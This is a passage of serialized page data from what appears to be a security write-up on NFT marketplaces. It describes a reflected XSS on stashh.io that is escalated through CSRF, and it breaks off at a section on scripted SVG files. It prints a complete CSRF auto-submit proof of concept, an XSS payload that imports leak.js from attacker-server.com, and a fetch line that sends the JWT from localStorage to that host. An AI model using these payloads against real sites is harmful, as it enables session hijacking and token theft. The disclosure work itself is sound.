dataTransfer",{"type":26,"tag":137,"props":35632,"children":35633},{"style":5590},[35634],{"type":32,"value":35507},{"type":26,"tag":137,"props":35636,"children":35637},{"style":5573},[35638],{"type":32,"value":17714},{"type":26,"tag":137,"props":35640,"children":35641},{"style":5682},[35642],{"type":32,"value":35643}," DataTransfer",{"type":26,"tag":137,"props":35645,"children":35646},{"style":5590},[35647],{"type":32,"value":6267},{"type":26,"tag":137,"props":35649,"children":35650},{"class":5559,"line":6279},[35651,35656,35660,35665,35669,35673,35677,35681],{"type":26,"tag":137,"props":35652,"children":35653},{"style":5584},[35654],{"type":32,"value":35655},"        dataTransfer",{"type":26,"tag":137,"props":35657,"children":35658},{"style":5590},[35659],{"type":32,"value":470},{"type":26,"tag":137,"props":35661,"children":35662},{"style":5584},[35663],{"type":32,"value":35664},"items",{"type":26,"tag":137,"props":35666,"children":35667},{"style":5590},[35668],{"type":32,"value":470},{"type":26,"tag":137,"props":35670,"children":35671},{"style":5682},[35672],{"type":32,"value":12227},{"type":26,"tag":137,"props":35674,"children":35675},{"style":5590},[35676],{"type":32,"value":165},{"type":26,"tag":137,"props":35678,"children":35679},{"style":5584},[35680],{"type":32,"value":1042},{"type":26,"tag":137,"props":35682,"children":35683},{"style":5590},[35684],{"type":32,"value":6430},{"type":26,"tag":137,"props":35686,"children":35687},{"class":5559,"line":6288},[35688],{"type":26,"tag":137,"props":35689,"children":35690},{"emptyLinePlaceholder":18},[35691],{"type":32,"value":6276},{"type":26,"tag":137,"props":35693,"children":35694},{"class":5559,"line":6355},[35695,35700,35704,35709,35713,35718,35722,35726],{"type":26,"tag":137,"props":35696,"children":35697},{"style":5584},[35698],{"type":32,"value":35699},"        file123",{"type":26,"tag":137,"props":35701,"children":35702},{"style":5590},[35703],{"type":32,"value":470},{"type":26,"tag":137,"props":35705,"children":35706},{"style":5584},[35707],{"type":32,"value":35708},"files",{"type":26,"tag":137,"props":35710,"children":35711},{"style":5590},[35712],{"type":32,"value":35507},{"type":26,"tag":137,"props":35714,"children":35715},{"style":5584},[35716],{"type":32,"value":35717},"dataTransfer",{"type":26,"tag":137,"props":35719,"children":35720},{"style":5590},[35721],{"type":32,"value":470},{"type":26,"tag":137,"props":35723,"children":35724},{"style":5584},[35725],{"type":32,"value":35708},{"type":26,"tag":137,"props":35727,"children":35728},{"style":5590},[35729],{"type":32,"value":5604},{"type":26,"tag":137,"props":35731,"children":35732},{"class":5559,"line":6363},[35733,35738],{"type":26,"tag":137,"props":35734,"children":35735},{"style":5573},[35736],{"type":32,"value":35737},"    }",{"type":26,"tag":137,"props":35739,"children":35740},{"style":5601},[35741],{"type":32,"value":35742},")()\n",{"type":26,"tag":137,"props":35744,"children":35745},{"class":5559,"line":6393},[35746],{"type":26,"tag":137,"props":35747,"children":35748},{"emptyLinePlaceholder":18},[35749],{"type":32,"value":6276},{"type":26,"tag":137,"props":35751,"children":35752},{"class":5559,"line":6401},[35753,35757,35761],{"type":26,"tag":137,"props":35754,"children":35755},{"style":34971},[35756],{"type":32,"value":35440},{"type":26,"tag":137,"props":35758,"children":35759},{"style":5573},[35760],{"type":32,"value":35011},{"type":26,"tag":137,"props":35762,"children":35763},{"style":34971},[35764],{"type":32,"value":8577},{"type":26,"tag":137,"props":35766,"children":35767},{"class":5559,"line":6433},[35768,35772,35776],{"type":26,"tag":137,"props":35769,"children":35770},{"style":34971},[35771],{"type":32,"value":35025},{"type":26,"tag":137,"props":35773,"children":35774},{"style":5573},[35775],{"type":32,"value":34978},{"type":26,"tag":137,"props":35777,"children":35778},{"style":34971},[35779],{"type":32,"value":8577},{"type":26,"tag":35,"props":35781,"children":35782},{},[35783],{"type":32,"value":35784},"When playing around with the application, we discovered that if an invalid address was submitted, the user's input would be reflected directly inside the response, another possible XSS vulnerability.",{"type":26,"tag":35,"props":35786,"children":35787},{},[35788],{"type":32,"value":35789},"However, since the request was a POST request, we initially thought this was only a self-XSS.",{"type":26,"tag":35,"props":35791,"children":35792},{},[35793],{"type":32,"value":35794},"In an effort to increase the impact of the above vulnerability, we discovered a way to leverage Cross-Site Request Forgery (CSRF) to manipulate the user's browser into sending a forced request that contained our XSS payload.",{"type":26,"tag":35,"props":35796,"children":35797},{},[35798],{"type":32,"value":35799},"From here, we were able to steal the session cookie from local storage.",{"type":26,"tag":5512,"props":35801,"children":35803},{"className":33958,"code":35802,"language":33960,"meta":7,"style":7},"\u003Chtml>\n  \u003Cbody>\n  \u003Cscript>history.pushState('', '', '/')\u003C/script>\n    \u003Cform id=\"form123\" action=\"https://stashh.io/upload_asset\" method=\"POST\" enctype=\"multipart/form-data\" value=\"asd\">\n     \u003Cinput type=\"file\" name=\"data\" id=\"file123\">\n      \u003Cinput type=\"hidden\" name=\"config\" value=\"{"address":"<img/src=x onerror=import(`https://attacker-server.com/leak.js`)>","to":"profile-assets","type":"icon"}\" />\n      \u003Cinput type=\"submit\" value=\"Submit request\" />\n    \u003C/form>\n  \u003C/body>\n\n  \u003Cscript>\n\n    (async ()=>{\n        const blob = await (await fetch(\"/sapo.png\")).blob()\n\n        let f = new File([blob], 'sapo.png', {type: 'image/png'})\n        const dataTransfer = new DataTransfer();\n        dataTransfer.items.add(f);\n\n        file123.files = dataTransfer.files;\n\n        form123.submit()\n    })()\n\n  \u003C/script>\n\u003C/html>\n",[35804],{"type":26,"tag":130,"props":35805,"children":35806},{"__ignoreMap":7},[35807,35822,35837,35868,35943,35994,36182,36221,36236,36251,36258,36273,36280,36291,36342,36349,36404,36431,36466,36473,36508,36515,36536,36547,36554,36569],{"type":26,"tag":137,"props":35808,"children":35809},{"class":5559,"line":5560},[35810,35814,35818],{"type":26,"tag":137,"props":35811,"children":35812},{"style":34971},[35813],{"type":32,"value":8391},{"type":26,"tag":137,"props":35815,"children":35816},{"style":5573},[35817],{"type":32,"value":34978},{"type":26,"tag":137,"props":35819,"children":35820},{"style":34971},[35821],{"type":32,"value":8577},{"type":26,"tag":137,"props":35823,"children":35824},{"class":5559,"line":5412},[35825,35829,35833],{"type":26,"tag":137,"props":35826,"children":35827},{"style":34971},[35828],{"type":32,"value":34990},{"type":26,"tag":137,"props":35830,"children":35831},{"style":5573},[35832],{"type":32,"value":34995},{"type":26,"tag":137,"props":35834,"children":35835},{"style":34971},[35836],{"type":32,"value":8577},{"type":26,"tag":137,"props":35838,"children":35839},{"class":5559,"line":5417},[35840,35844,35848,35852,35856,35860,35864],{"type":26,"tag":137,"props":35841,"children":35842},{"style":34971},[35843],{"type":32,"value":34990},{"type":26,"tag":137,"props":35845,"children":35846},{"style":5573},[35847],{"type":32,"value":35011},{"type":26,"tag":137,"props":35849,"children":35850},{"style":34971},[35851],{"type":32,"value":13052},{"type":26,"tag":137,"props":35853,"children":35854},{"style":5601},[35855],{"type":32,"value":35020},{"type":26,"tag":137,"props":35857,"children":35858},{"style":34971},[35859],{"type":32,"value":35025},{"type":26,"tag":137,"props":35861,"children":35862},{"style":5573},[35863],{"type":32,"value":35011},{"type":26,"tag":137,"props":35865,"children":35866},{"style":34971},[35867],{"type":32,"value":8577},{"type":26,"tag":137,"props":35869,"children":35870},{"class":5559,"line":5642},[35871,35875,35879,35883,35887,35891,35895,35899,35903,35907,35911,35915,35919,35923,35927,35931,35935,35939],{"type":26,"tag":137,"props":35872,"children":35873},{"style":34971},[35874],{"type":32,"value":35041},{"type":26,"tag":137,"props":35876,"children":35877},{"style":5573},[35878],{"type":32,"value":35046},{"type":26,"tag":137,"props":35880,"children":35881},{"style":5584},[35882],{"type":32,"value":35051},{"type":26,"tag":137,"props":35884,"children":35885},{"style":5590},[35886],{"type":32,"value":289},{"type":26,"tag":137,"props":35888,"children":35889},{"style":6837},[35890],{"type":32,"value":35060},{"type":26,"tag":137,"props":35892,"children":35893},{"style":5584},[35894],{"type":32,"value":35065},{"type":26,"tag":137,"props":35896,"children":35897},{"style":5590},[35898],{"type":32,"value":289},{"type":26,"tag":137,"props":35900,"children":35901},{"style":6837},[35902],{"type":32,"value":35074},{"type":26,"tag":137,"props":35904,"children":35905},{"style":5584},[35906],{"type":32,"value":19703},{"type":26,"tag":137,"props":35908,"children":35909},{"style":5590},[35910],{"type":32,"value":289},{"type":26,"tag":137,"props":35912,"children":35913},{"style":6837},[35914],{"type":32,"value":35087},{"type":26,"tag":137,"props":35916,"children":35917},{"style":5584},[35918],{"type":32,"value":35092},{"type":26,"tag":137,"props":35920,"children":35921},{"style":5590},[35922],{"type":32,"value":289},{"type":26,"tag":137,"props":35924,"children":35925},{"style":6837},[35926],{"type":32,"value":35101},{"type":26,"tag":137,"props":35928,"children":35929},{"style":5584},[35930],{"type":32,"value":35106},{"type":26,"tag":137,"props":35932,"children":35933},{"style":5590},[35934],{"type":32,"value":289},{"type":26,"tag":137,"props":35936,"children":35937},{"style":6837},[35938],{"type":32,"value":35115},{"type":26,"tag":137,"props":35940,"children":35941},{"style":34971},[35942],{"type":32,"value":8577},{"type":26,"tag":137,"props":35944,"children":35945},{"class":5559,"line":5745},[35946,35950,35954,35958,35962,35966,35970,35974,35978,35982,35986,35990],{"type":26,"tag":137,"props":35947,"children":35948},{"style":34971},[35949],{"type":32,"value":35127},{"type":26,"tag":137,"props":35951,"children":35952},{"style":5573},[35953],{"type":32,"value":10952},{"type":26,"tag":137,"props":35955,"children":35956},{"style":5584},[35957],{"type":32,"value":35136},{"type":26,"tag":137,"props":35959,"children":35960},{"style":5590},[35961],{"type":32,"value":289},{"type":26,"tag":137,"props":35963,"children":35964},{"style":6837},[35965],{"type":32,"value":35145},{"type":26,"tag":137,"props":35967,"children":35968},{"style":5584},[35969],{"type":32,"value":35150},{"type":26,"tag":137,"props":35971,"children":35972},{"style":5590},[35973],{"type":32,"value":289},{"type":26,"tag":137,"props":35975,"children":35976},{"style":6837},[35977],{"type":32,"value":35159},{"type":26,"tag":137,"props":35979,"children":35980},{"style":5584},[35981],{"type":32,"value":35051},{"type":26,"tag":137,"props":35983,"children":35984},{"style":5590},[35985],{"type":32,"value":289},{"type":26,"tag":137,"props":35987,"children":35988},{"style":6837},[35989],{"type":32,"value":35172},{"type":26,"tag":137,"props":35991,"children":35992},{"style":34971},[35993],{"type":32,"value":8577},{"type":26,"tag":137,"props":35995,"children":35996},{"class":5559,"line":5850},[35997,36001,36005,36009,36013,36017,36021,36025,36029,36033,36037,36041,36046,36050,36055,36059,36064,36068,36073,36078,36082,36086,36091,36096,36101,36106,36111,36116,36120,36125,36129,36133,36138,36142,36147,36152,36157,36161,36165,36169,36174,36178],{"type":26,"tag":137,"props":35998,"children":35999},{"style":34971},[36000],{"type":32,"value":35184},{"type":26,"tag":137,"props":36002,"children":36003},{"style":5573},[36004],{"type":32,"value":10952},{"type":26,"tag":137,"props":36006,"children":36007},{"style":5584},[36008],{"type":32,"value":35136},{"type":26,"tag":137,"props":36010,"children":36011},{"style":5590},[36012],{"type":32,"value":289},{"type":26,"tag":137,"props":36014,"children":36015},{"style":6837},[36016],{"type":32,"value":35201},{"type":26,"tag":137,"props":36018,"children":36019},{"style":5584},[36020],{"type":32,"value":35150},{"type":26,"tag":137,"props":36022,"children":36023},{"style":5590},[36024],{"type":32,"value":289},{"type":26,"tag":137,"props":36026,"children":36027},{"style":6837},[36028],{"type":32,"value":35214},{"type":26,"tag":137,"props":36030,"children":36031},{"style":5584},[36032],{"type":32,"value":35106},{"type":26,"tag":137,"props":36034,"children":36035},{"style":5590},[36036],{"type":32,"value":289},{"type":26,"tag":137,"props":36038,"children":36039},{"style":6837},[36040],{"type":32,"value":22653},{"type":26,"tag":137,"props":36042,"children":36043},{"style":5573},[36044],{"type":32,"value":36045},"{"",{"type":26,"tag":137,"props":36047,"children":36048},{"style":6837},[36049],{"type":32,"value":35236},{"type":26,"tag":137,"props":36051,"children":36052},{"style":5573},[36053],{"type":32,"value":36054},"":"<",{"type":26,"tag":137,"props":36056,"children":36057},{"style":6837},[36058],{"type":32,"value":2210},{"type":26,"tag":137,"props":36060,"children":36061},{"style":5573},[36062],{"type":32,"value":36063},"/",{"type":26,"tag":137,"props":36065,"children":36066},{"style":6837},[36067],{"type":32,"value":35265},{"type":26,"tag":137,"props":36069,"children":36070},{"style":5573},[36071],{"type":32,"value":36072},"=",{"type":26,"tag":137,"props":36074,"children":36075},{"style":6837},[36076],{"type":32,"value":36077},"x onerror",{"type":26,"tag":137,"props":36079,"children":36080},{"style":5573},[36081],{"type":32,"value":36072},{"type":26,"tag":137,"props":36083,"children":36084},{"style":6837},[36085],{"type":32,"value":22076},{"type":26,"tag":137,"props":36087,"children":36088},{"style":5573},[36089],{"type":32,"value":36090},"(`",{"type":26,"tag":137,"props":36092,"children":36093},{"style":6837},[36094],{"type":32,"value":36095},"https",{"type":26,"tag":137,"props":36097,"children":36098},{"style":5573},[36099],{"type":32,"value":36100},"://",{"type":26,"tag":137,"props":36102,"children":36103},{"style":6837},[36104],{"type":32,"value":36105},"attacker-server",{"type":26,"tag":137,"props":36107,"children":36108},{"style":5573},[36109],{"type":32,"value":36110},".",{"type":26,"tag":137,"props":36112,"children":36113},{"style":6837},[36114],{"type":32,"value":36115},"com",{"type":26,"tag":137,"props":36117,"children":36118},{"style":5573},[36119],{"type":32,"value":36063},{"type":26,"tag":137,"props":36121,"children":36122},{"style":6837},[36123],{"type":32,"value":36124},"leak",{"type":26,"tag":137,"props":36126,"children":36127},{"style":5573},[36128],{"type":32,"value":36110},{"type":26,"tag":137,"props":36130,"children":36131},{"style":6837},[36132],{"type":32,"value":33960},{"type":26,"tag":137,"props":36134,"children":36135},{"style":5573},[36136],{"type":32,"value":36137},"`)>","",{"type":26,"tag":137,"props":36139,"children":36140},{"style":6837},[36141],{"type":32,"value":35323},{"type":26,"tag":137,"props":36143,"children":36144},{"style":5573},[36145],{"type":32,"value":36146},"":"",{"type":26,"tag":137,"props":36148,"children":36149},{"style":6837},[36150],{"type":32,"value":36151},"profile-assets",{"type":26,"tag":137,"props":36153,"children":36154},{"style":5573},[36155],{"type":32,"value":36156},"","",{"type":26,"tag":137,"props":36158,"children":36159},{"style":6837},[36160],{"type":32,"value":35352},{"type":26,"tag":137,"props":36162,"children":36163},{"style":5573},[36164],{"type":32,"value":36146},{"type":26,"tag":137,"props":36166,"children":36167},{"style":6837},[36168],{"type":32,"value":35361},{"type":26,"tag":137,"props":36170,"children":36171},{"style":5573},[36172],{"type":32,"value":36173},""}",{"type":26,"tag":137,"props":36175,"children":36176},{"style":6837},[36177],{"type":32,"value":22653},{"type":26,"tag":137,"props":36179,"children":36180},{"style":34971},[36181],{"type":32,"value":35375},{"type":26,"tag":137,"props":36183,"children":36184},{"class":5559,"line":5878},[36185,36189,36193,36197,36201,36205,36209,36213,36217],{"type":26,"tag":137,"props":36186,"children":36187},{"style":34971},[36188],{"type":32,"value":35184},{"type":26,"tag":137,"props":36190,"children":36191},{"style":5573},[36192],{"type":32,"value":10952},{"type":26,"tag":137,"props":36194,"children":36195},{"style":5584},[36196],{"type":32,"value":35136},{"type":26,"tag":137,"props":36198,"children":36199},{"style":5590},[36200],{"type":32,"value":289},{"type":26,"tag":137,"props":36202,"children":36203},{"style":6837},[36204],{"type":32,"value":35399},{"type":26,"tag":137,"props":36206,"children":36207},{"style":5584},[36208],{"type":32,"value":35106},{"type":26,"tag":137,"props":36210,"children":36211},{"style":5590},[36212],{"type":32,"value":289},{"type":26,"tag":137,"props":36214,"children":36215},{"style":6837},[36216],{"type":32,"value":35412},{"type":26,"tag":137,"props":36218,"children":36219},{"style":34971},[36220],{"type":32,"value":35375},{"type":26,"tag":137,"props":36222,"children":36223},{"class":5559,"line":5891},[36224,36228,36232],{"type":26,"tag":137,"props":36225,"children":36226},{"style":34971},[36227],{"type":32,"value":35424},{"type":26,"tag":137,"props":36229,"children":36230},{"style":5573},[36231],{"type":32,"value":35046},{"type":26,"tag":137,"props":36233,"children":36234},{"style":34971},[36235],{"type":32,"value":8577},{"type":26,"tag":137,"props":36237,"children":36238},{"class":5559,"line":5909},[36239,36243,36247],{"type":26,"tag":137,"props":36240,"children":36241},{"style":34971},[36242],{"type":32,"value":35440},{"type":26,"tag":137,"props":36244,"children":36245},{"style":5573},[36246],{"type":32,"value":34995},{"type":26,"tag":137,"props":36248,"children":36249},{"style":34971},[36250],{"type":32,"value":8577},{"type":26,"tag":137,"props":36252,"children":36253},{"class":5559,"line":5930},[36254],{"type":26,"tag":137,"props":36255,"children":36256},{"emptyLinePlaceholder":18},[36257],{"type":32,"value":6276},{"type":26,"tag":137,"props":36259,"children":36260},{"class":5559,"line":5939},[36261,36265,36269],{"type":26,"tag":137,"props":36262,"children":36263},{"style":34971},[36264],{"type":32,"value":34990},{"type":26,"tag":137,"props":36266,"children":36267},{"style":5573},[36268],{"type":32,"value":35011},{"type":26,"tag":137,"props":36270,"children":36271},{"style":34971},[36272],{"type":32,"value":8577},{"type":26,"tag":137,"props":36274,"children":36275},{"class":5559,"line":6191},[36276],{"type":26,"tag":137,"props":36277,"children":36278},{"emptyLinePlaceholder":18},[36279],{"type":32,"value":6276},{"type":26,"tag":137,"props":36281,"children":36282},{"class":5559,"line":6208},[36283,36287],{"type":26,"tag":137,"props":36284,"children":36285},{"style":5601},[36286],{"type":32,"value":35485},{"type":26,"tag":137,"props":36288,"children":36289},{"style":5573},[36290],{"type":32,"value":13471},{"type":26,"tag":137,"props":36292,"children":36293},{"class":5559,"line":6225},[36294,36298,36302,36306,36310,36314,36318,36322,36326,36330,36334,36338],{"type":26,"tag":137,"props":36295,"children":36296},{"style":5584},[36297],{"type":32,"value":35497},{"type":26,"tag":137,"props":36299,"children":36300},{"style":5584},[36301],{"type":32,"value":35502},{"type":26,"tag":137,"props":36303,"children":36304},{"style":5590},[36305],{"type":32,"value":35507},{"type":26,"tag":137,"props":36307,"children":36308},{"style":5610},[36309],{"type":32,"value":35512},{"type":26,"tag":137,"props":36311,"children":36312},{"style":5590},[36313],{"type":32,"value":4625},{"type":26,"tag":137,"props":36315,"children":36316},{"style":5610},[36317],{"type":32,"value":35512},{"type":26,"tag":137,"props":36319,"children":36320},{"style":5682},[36321],{"type":32,"value":35525},{"type":26,"tag":137,"props":36323,"children":36324},{"style":5590},[36325],{"type":32,"value":165},{"type":26,"tag":137,"props":36327,"children":36328},{"style":6837},[36329],{"type":32,"value":35534},{"type":26,"tag":137,"props":36331,"children":36332},{"style":5590},[36333],{"type":32,"value":35539},{"type":26,"tag":137,"props":36335,"children":36336},{"style":5682},[36337],{"type":32,"value":35544},{"type":26,"tag":137,"props":36339,"children":36340},{"style":5590},[36341],{"type":32,"value":10320},{"type":26,"tag":137,"props":36343,"children":36344},{"class":5559,"line":6238},[36345],{"type":26,"tag":137,"props":36346,"children":36347},{"emptyLinePlaceholder":18},[36348],{"type":32,"value":6276},{"type":26,"tag":137,"props":36350,"children":36351},{"class":5559,"line":6247},[36352,36356,36360,36364,36368,36372,36376,36380,36384,36388,36392,36396,36400],{"type":26,"tag":137,"props":36353,"children":36354},{"style":5584},[36355],{"type":32,"value":5648},{"type":26,"tag":137,"props":36357,"children":36358},{"style":5584},[36359],{"type":32,"value":35567},{"type":26,"tag":137,"props":36361,"children":36362},{"style":5590},[36363],{"type":32,"value":35507},{"type":26,"tag":137,"props":36365,"children":36366},{"style":5573},[36367],{"type":32,"value":17714},{"type":26,"tag":137,"props":36369,"children":36370},{"style":5682},[36371],{"type":32,"value":35580},{"type":26,"tag":137,"props":36373,"children":36374},{"style":5590},[36375],{"type":32,"value":35585},{"type":26,"tag":137,"props":36377,"children":36378},{"style":5584},[36379],{"type":32,"value":35544},{"type":26,"tag":137,"props":36381,"children":36382},{"style":5590},[36383],{"type":32,"value":25640},{"type":26,"tag":137,"props":36385,"children":36386},{"style":6837},[36387],{"type":32,"value":35598},{"type":26,"tag":137,"props":36389,"children":36390},{"style":5590},[36391],{"type":32,"value":35603},{"type":26,"tag":137,"props":36393,"children":36394},{"style":5584},[36395],{"type":32,"value":35608},{"type":26,"tag":137,"props":36397,"children":36398},{"style":6837},[36399],{"type":32,"value":35613},{"type":26,"tag":137,"props":36401,"children":36402},{"style":5590},[36403],{"type":32,"value":35618},{"type":26,"tag":137,"props":36405,"children":36406},{"class":5559,"line":6270},[36407,36411,36415,36419,36423,36427],{"type":26,"tag":137,"props":36408,"children":36409},{"style":5584},[36410],{"type":32,"value":35497},{"type":26,"tag":137,"props":36412,"children":36413},{"style":5584},[36414],{"type":32,"value":35630},{"type":26,"tag":137,"props":36416,"children":36417},{"style":5590},[36418],{"type":32,"value":35507},{"type":26,"tag":137,"props":36420,"children":36421},{"style":5573},[36422],{"type":32,"value":17714},{"type":26,"tag":137,"props":36424,"children":36425},{"style":5682},[36426],{"type":32,"value":35643},{"type":26,"tag":137,"props":36428,"children":36429},{"style":5590},[36430],{"type":32,"value":6267},{"type":26,"tag":137,"props":36432,"children":36433},{"class":5559,"line":6279},[36434,36438,36442,36446,36450,36454,36458,36462],{"type":26,"tag":137,"props":36435,"children":36436},{"style":5584},[36437],{"type":32,"value":35655},{"type":26,"tag":137,"props":36439,"children":36440},{"style":5590},[36441],{"type":32,"value":470},{"type":26,"tag":137,"props":36443,"children":36444},{"style":5584},[36445],{"type":32,"value":35664},{"type":26,"tag":137,"props":36447,"children":36448},{"style":5590},[36449],{"type":32,"value":470},{"type":26,"tag":137,"props":36451,"children":36452},{"style":5682},[36453],{"type":32,"value":12227},{"type":26,"tag":137,"props":36455,"children":36456},{"style":5590},[36457],{"type":32,"value":165},{"type":26,"tag":137,"props":36459,"children":36460},{"style":5584},[36461],{"type":32,"value":1042},{"type":26,"tag":137,"props":36463,"children":36464},{"style":5590},[36465],{"type":32,"value":6430},{"type":26,"tag":137,"props":36467,"children":36468},{"class":5559,"line":6288},[36469],{"type":26,"tag":137,"props":36470,"children":36471},{"emptyLinePlaceholder":18},[36472],{"type":32,"value":6276},{"type":26,"tag":137,"props":36474,"children":36475},{"class":5559,"line":6355},[36476,36480,36484,36488,36492,36496,36500,36504],{"type":26,"tag":137,"props":36477,"children":36478},{"style":5584},[36479],{"type":32,"value":35699},{"type":26,"tag":137,"props":36481,"children":36482},{"style":5590},[36483],{"type":32,"value":470},{"type":26,"tag":137,"props":36485,"children":36486},{"style":5584},[36487],{"type":32,"value":35708},{"type":26,"tag":137,"props":36489,"children":36490},{"style":5590},[36491],{"type":32,"value":35507},{"type":26,"tag":137,"props":36493,"children":36494},{"style":5584},[36495],{"type":32,"value":35717},{"type":26,"tag":137,"props":36497,"children":36498},{"style":5590},[36499],{"type":32,"value":470},{"type":26,"tag":137,"props":36501,"children":36502},{"style":5584},[36503],{"type":32,"value":35708},{"type":26,"tag":137,"props":36505,"children":36506},{"style":5590},[36507],{"type":32,"value":5604},{"type":26,"tag":137,"props":36509,"children":36510},{"class":5559,"line":6363},[36511],{"type":26,"tag":137,"props":36512,"children":36513},{"emptyLinePlaceholder":18},[36514],{"type":32,"value":6276},{"type":26,"tag":137,"props":36516,"children":36517},{"class":5559,"line":6393},[36518,36523,36527,36532],{"type":26,"tag":137,"props":36519,"children":36520},{"style":5584},[36521],{"type":32,"value":36522},"        form123",{"type":26,"tag":137,"props":36524,"children":36525},{"style":5590},[36526],{"type":32,"value":470},{"type":26,"tag":137,"props":36528,"children":36529},{"style":5682},[36530],{"type":32,"value":36531},"submit",{"type":26,"tag":137,"props":36533,"children":36534},{"style":5590},[36535],{"type":32,"value":10320},{"type":26,"tag":137,"props":36537,"children":36538},{"class":5559,"line":6401},[36539,36543],{"type":26,"tag":137,"props":36540,"children":36541},{"style":5573},[36542],{"type":32,"value":35737},{"type":26,"tag":137,"props":36544,"children":36545},{"style":5601},[36546],{"type":32,"value":35742},{"type":26,"tag":137,"props":36548,"children":36549},{"class":5559,"line":6433},[36550],{"type":26,"tag":137,"props":36551,"children":36552},{"emptyLinePlaceholder":18},[36553],{"type":32,"value":6276},{"type":26,"tag":137,"props":36555,"children":36556},{"class":5559,"line":6441},[36557,36561,36565],{"type":26,"tag":137,"props":36558,"children":36559},{"style":34971},[36560],{"type":32,"value":35440},{"type":26,"tag":137,"props":36562,"children":36563},{"style":5573},[36564],{"type":32,"value":35011},{"type":26,"tag":137,"props":36566,"children":36567},{"style":34971},[36568],{"type":32,"value":8577},{"type":26,"tag":137,"props":36570,"children":36571},{"class":5559,"line":6501},[36572,36576,36580],{"type":26,"tag":137,"props":36573,"children":36574},{"style":34971},[36575],{"type":32,"value":35025},{"type":26,"tag":137,"props":36577,"children":36578},{"style":5573},[36579],{"type":32,"value":34978},{"type":26,"tag":137,"props":36581,"children":36582},{"style":34971},[36583],{"type":32,"value":8577},{"type":26,"tag":35,"props":36585,"children":36586},{},[36587],{"type":32,"value":36588},"This script automatically sends the following config in POST body, which triggers the XSS and imports a malicious javascript file from attacker's server:",{"type":26,"tag":5512,"props":36590,"children":36594},{"className":36591,"code":36592,"language":36593,"meta":7,"style":7},"language-json shiki shiki-themes slack-dark","{\n  \"address\": \"\u003Cimg/src=x onerror=import(`https://attacker-server.com/leak.js`)>\",\n  \"to\": \"profile-assets\",\n  \"type\": \"icon\"\n}\n","json",[36595],{"type":26,"tag":130,"props":36596,"children":36597},{"__ignoreMap":7},[36598,36605,36626,36647,36664],{"type":26,"tag":137,"props":36599,"children":36600},{"class":5559,"line":5560},[36601],{"type":26,"tag":137,"props":36602,"children":36603},{"style":5601},[36604],{"type":32,"value":13471},{"type":26,"tag":137,"props":36606,"children":36607},{"class":5559,"line":5412},[36608,36613,36617,36622],{"type":26,"tag":137,"props":36609,"children":36610},{"style":5584},[36611],{"type":32,"value":36612},"  \"address\"",{"type":26,"tag":137,"props":36614,"children":36615},{"style":5601},[36616],{"type":32,"value":17923},{"type":26,"tag":137,"props":36618,"children":36619},{"style":6837},[36620],{"type":32,"value":36621},"\"\u003Cimg/src=x onerror=import(`https://attacker-server.com/leak.js`)>\"",{"type":26,"tag":137,"props":36623,"children":36624},{"style":5601},[36625],{"type":32,"value":6099},{"type":26,"tag":137,"props":36627,"children":36628},{"class":5559,"line":5417},[36629,36634,36638,36643],{"type":26,"tag":137,"props":36630,"children":36631},{"style":5584},[36632],{"type":32,"value":36633},"  \"to\"",{"type":26,"tag":137,"props":36635,"children":36636},{"style":5601},[36637],{"type":32,"value":17923},{"type":26,"tag":137,"props":36639,"children":36640},{"style":6837},[36641],{"type":32,"value":36642},"\"profile-assets\"",{"type":26,"tag":137,"props":36644,"children":36645},{"style":5601},[36646],{"type":32,"value":6099},{"type":26,"tag":137,"props":36648,"children":36649},{"class":5559,"line":5642},[36650,36655,36659],{"type":26,"tag":137,"props":36651,"children":36652},{"style":5584},[36653],{"type":32,"value":36654},"  \"type\"",{"type":26,"tag":137,"props":36656,"children":36657},{"style":5601},[36658],{"type":32,"value":17923},{"type":26,"tag":137,"props":36660,"children":36661},{"style":6837},[36662],{"type":32,"value":36663},"\"icon\"\n",{"type":26,"tag":137,"props":36665,"children":36666},{"class":5559,"line":5745},[36667],{"type":26,"tag":137,"props":36668,"children":36669},{"style":5601},[36670],{"type":32,"value":6507},{"type":26,"tag":35,"props":36672,"children":36673},{},[36674],{"type":32,"value":36675},"Then, the imported script is able to exfiltrate the JWT authentication token from stashh.io:",{"type":26,"tag":5512,"props":36677,"children":36679},{"className":33958,"code":36678,"language":33960,"meta":7,"style":7},"fetch(`https://attacker-server.com/?token_leak=${localStorage.getItem('token')}`);\n",[36680],{"type":26,"tag":130,"props":36681,"children":36682},{"__ignoreMap":7},[36683],{"type":26,"tag":137,"props":36684,"children":36685},{"class":5559,"line":5560},[36686,36691,36695,36700,36705,36710,36714,36719,36723,36728,36732,36737,36741],{"type":26,"tag":137,"props":36687,"children":36688},{"style":5682},[36689],{"type":32,"value":36690},"fetch",{"type":26,"tag":137,"props":36692,"children":36693},{"style":5601},[36694],{"type":32,"value":165},{"type":26,"tag":137,"props":36696,"children":36697},{"style":6837},[36698],{"type":32,"value":36699},"`https://attacker-server.com/?token_leak=",{"type":26,"tag":137,"props":36701,"children":36702},{"style":5573},[36703],{"type":32,"value":36704},"${",{"type":26,"tag":137,"props":36706,"children":36707},{"style":5584},[36708],{"type":32,"value":36709},"localStorage",{"type":26,"tag":137,"props":36711,"children":36712},{"style":5590},[36713],{"type":32,"value":470},{"type":26,"tag":137,"props":36715,"children":36716},{"style":5682},[36717],{"type":32,"value":36718},"getItem",{"type":26,"tag":137,"props":36720,"children":36721},{"style":5590},[36722],{"type":32,"value":165},{"type":26,"tag":137,"props":36724,"children":36725},{"style":6837},[36726],{"type":32,"value":36727},"'token'",{"type":26,"tag":137,"props":36729,"children":36730},{"style":5590},[36731],{"type":32,"value":200},{"type":26,"tag":137,"props":36733,"children":36734},{"style":5573},[36735],{"type":32,"value":36736},"}",{"type":26,"tag":137,"props":36738,"children":36739},{"style":6837},[36740],{"type":32,"value":12972},{"type":26,"tag":137,"props":36742,"children":36743},{"style":5601},[36744],{"type":32,"value":6430},{"type":26,"tag":118,"props":36746,"children":36748},{"id":36747},"svgs",[36749],{"type":32,"value":36750},"SVGs",{"type":26,"tag":35,"props":36752,"children":36753},{},[36754],{"type":32,"value":36755},"After closely analyzing various NFT marketplaces, we noticed a common shared feature; the ability to update profile pictures or insert NFT assets using SVG files. SVG is an XML- based format that defines graphics and how they interact.",{"type":26,"tag":35,"props":36757,"children":36758},{},[36759],{"type":32,"value":36760},"Unbeknownst to some people, SVG files can contain JavaScript and run arbitrary scripts.",{"type":26,"tag":5512,"props":36762,"children":36764},{"className":33958,"code":36763,"language":33960,"meta":7,"style":7},"\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" 